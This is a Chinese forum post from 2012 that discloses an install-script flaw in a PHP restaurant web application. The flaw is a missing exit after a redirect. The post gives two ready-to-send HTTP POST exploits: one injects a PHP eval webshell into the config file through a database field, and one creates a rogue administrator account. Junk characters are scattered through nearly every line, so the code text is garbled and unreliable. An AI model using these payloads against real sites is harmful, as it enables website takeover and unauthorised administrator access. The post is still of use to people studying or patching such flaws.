问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。4 q% o5 p! K% ^* {
X6 z2 l, x" r [& X+ ]$ n: {6 y<?php( V0 Z# `' ^* }; r4 Y
if(file_exists("../install.lock"))2 j& q7 X; m# G. H; j" L
{
! y6 ^4 F6 [, _9 k4 i- V+ ~7 R, L header("Location: ../");//没有退出8 N) A J! C6 S% n$ I. s
}
8 }4 J5 K9 f" A8 E2 {% n
6 U" z& S2 G" ^( Y7 `//echo 'tst';exit;/ A, n* \; b2 C# j0 C; _2 U
require_once("init.php");' d- h" w( p# F( X' g6 ^
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)3 ~! t& Z. e! D% C4 S* E% G
{% d, G. \) p1 v/ n* J, i
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。' P# m Q" `/ c+ F
8 L& g5 m* @% Z* X: ]' d5 R
1、getshell(很危险)
2 R# t+ P: u r" H& n( Eif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
- O1 j5 q/ A. z& q; Y2 t5 [8 y* p; W{, N. U/ J2 I5 t# f7 V# A
$smarty->assign("step",1);9 w5 x/ _! H: n, n
$smarty->display("index.html");, m" F2 o/ t) U6 ~2 l
}elseif($_REQUEST['step']==2)
4 H- B/ \6 }4 f. g7 H{+ E0 O, W8 ^8 O1 t
$mysql_host=trim($_POST['mysql_host']);! h: D% q! e- O* R" C) J+ u0 j
$mysql_user=trim($_POST['mysql_user']);; J5 G3 j' r; z' `4 f
$mysql_pwd=trim($_POST['mysql_pwd']);- Y8 @/ Y3 |+ ?+ y
$mysql_db=trim($_POST['mysql_db']); w0 y6 Z2 ?: W! k
$tblpre=trim($_POST['tblpre']);7 k" C" O- D& t, ~0 ~
$domain==trim($_POST['domain']);
7 P% r, Y* G- {5 U4 N $str="<?php \r\n";% G$ }) O! `) B' t$ R3 {' {# q
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";+ Z; n/ G0 R. ?* Q* S. G. ~' j! b
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
, I* e" |/ N, J: Y2 E$ | $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
/ H+ r, b3 ^' e2 C& T: D. B $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";# c4 H; D2 q# f- ?) _
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
( z9 f" e2 E( [ M* t $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
( D' q z7 u: I" ~% \8 L $str.='define("DOMAIN","'.$domain.'");'."\r\n";" r2 U+ s$ N4 Q" W8 x- e
$str.='define("SKINS","default");'."\r\n";
, b9 }& G d* [8 K$ r3 Y# e. u $str.='?>';
/ G4 {) q: ~9 A file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
( f, S' r- z5 N5 z$ _6 O1 _4 {0 x4 H上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马. _4 v# A; F$ G0 v9 r7 t8 v; R' F
POST /canting/install/index.php?m=index&step=2 HTTP/1.1& b9 c( ]' @, |) _/ p8 G
Host: 192.168.80.129
8 U1 l. R- v9 w9 V: c7 ?2 l) J& iUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
. H( }1 T% E5 J2 c4 S( uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8+ ~) u2 _, a9 y
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
4 e- e9 A( O5 l5 @Accept-Encoding: gzip, deflate9 V `! E$ o3 i: c/ y
Referer: http://192.168.80.129/canting/install/index.php?step=1
; o6 X% E+ Y9 c3 P1 J3 _! cCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42* R; c# \) L5 ^7 `
Content-Type: application/x-www-form-urlencoded/ [- j& K5 D7 M
Content-Length: 126
( `0 Y, j* w8 V" n1 r( b( I% Z # n G/ D+ H8 W. e N3 R+ `
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
( d: |. p0 v; J% I# G* [% N6 C但是这个方法很危险,将导致网站无法运行。# C% E5 a/ x+ M5 c' o
( v1 s6 ^# e `7 K8 T
2、直接添加管理员 O( c# a0 b* w( @9 \
! N; i1 \+ @7 f0 N: qelseif($_REQUEST['step']==5)
# N" ]; R5 e7 c( c: U2 E{; F x& o9 o1 u
if($_POST)) z( u7 H, t8 m3 U& p
{ require_once("../config/config.inc.php");
: l3 G$ b1 q6 K5 l9 @. J l $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
6 v2 `4 z; X+ N9 R mysql_select_db(MYSQL_DB,$link);
9 d' |8 p) J2 `1 x3 A& i mysql_query("SET NAMES ".MYSQL_CHARSET );2 t* u/ P T4 w, t
mysql_query("SET sql_mode=''");
( {! Q/ u* r0 o$ _7 k4 N
3 _1 l8 A5 b' d/ j1 Q $adminname=trim($_POST['adminname']);
, V9 K( r# `5 [5 T$ _3 E* v, O $pwd1=trim($_POST['pwd1']);+ y' n+ T$ D# f) X2 Z
$pwd2=trim($_POST['pwd2']);
+ ]2 t1 e0 { A$ b3 Y if(empty($adminname))6 x: h$ L) b) e$ q) h6 b7 @: E
{- ]1 ^6 l3 Z# I9 c+ x3 |5 Y& |
2 ~4 _ c" C* ^8 D
echo "<script>alert('管理员不能为空');history.go(-1);</script>"; ]3 |9 Z% M( M5 ~% c7 A
exit();
( A% C; ~, E3 C7 [6 z' {& o }
2 p6 z3 U% b* o if(($pwd1!=$pwd2) or empty($pwd1)): W+ S/ t) ?$ O3 G2 Z* s
{
& e- c2 o5 Q6 q echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
9 Y, f1 C9 L; v* X& [/ M }; g) } _) E- b. U) J
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
/ b7 e, b- I+ @ }$ y1 W# b$ i& |# g7 g9 n
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:6 g: f6 H6 R, ?/ l; w8 _
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
5 a( C. x( P9 E8 P! cHost: 192.168.80.129
( E: n K2 n6 {& [User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
/ Y% ^$ U3 [, b* @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
; ~3 o# E, N: h3 LAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
# d2 a, f- K0 p4 D2 Y+ _Accept-Encoding: gzip, deflate
+ T- x t1 S8 tReferer: http://www.2cto.com /canting/install/index.php?step=1$ P4 ] y- \8 g. v4 t4 S8 s
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42' I) s3 f9 z: o% ^2 S
Content-Type: application/x-www-form-urlencoded
! H7 Q8 |) n! i* gContent-Length: 46
' t# F' X5 z9 P/ k5 p / O0 z: `. j" G5 ~. y. d
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
- L5 y& S+ B) o1 Y9 D |
发表于 2012-12-4 11:13:44
收藏
支持
反对